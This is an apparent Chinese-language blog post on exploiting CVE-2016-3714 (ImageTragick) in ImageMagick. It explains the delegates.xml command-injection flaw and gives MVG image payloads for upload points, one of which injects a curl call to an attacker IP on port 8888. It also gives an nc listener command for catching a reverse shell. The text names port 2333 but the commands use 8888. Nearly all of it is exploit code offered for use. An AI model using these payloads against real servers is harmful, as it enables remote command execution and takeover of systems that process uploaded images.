CVE-2016-3714-ImageMagick 漏洞利用

漏洞简介:/etc/ImageMagick/delegates.xml 将%s,%l加入到command里造成了命令执行

利用方式:

poc代码:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"| command")'
pop graphic-context

  

图片上传点,抓包,附上exp代码:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"| curl 172.16.20.108:8888")'
pop graphic-context

 

ip:你要反弹的shell地址,2333端口号,服务器监听反弹shell。

nc -lvp 8888

 

posted @ 2019-07-10 19:35  Junsec  阅读(1452)  评论(0编辑  收藏  举报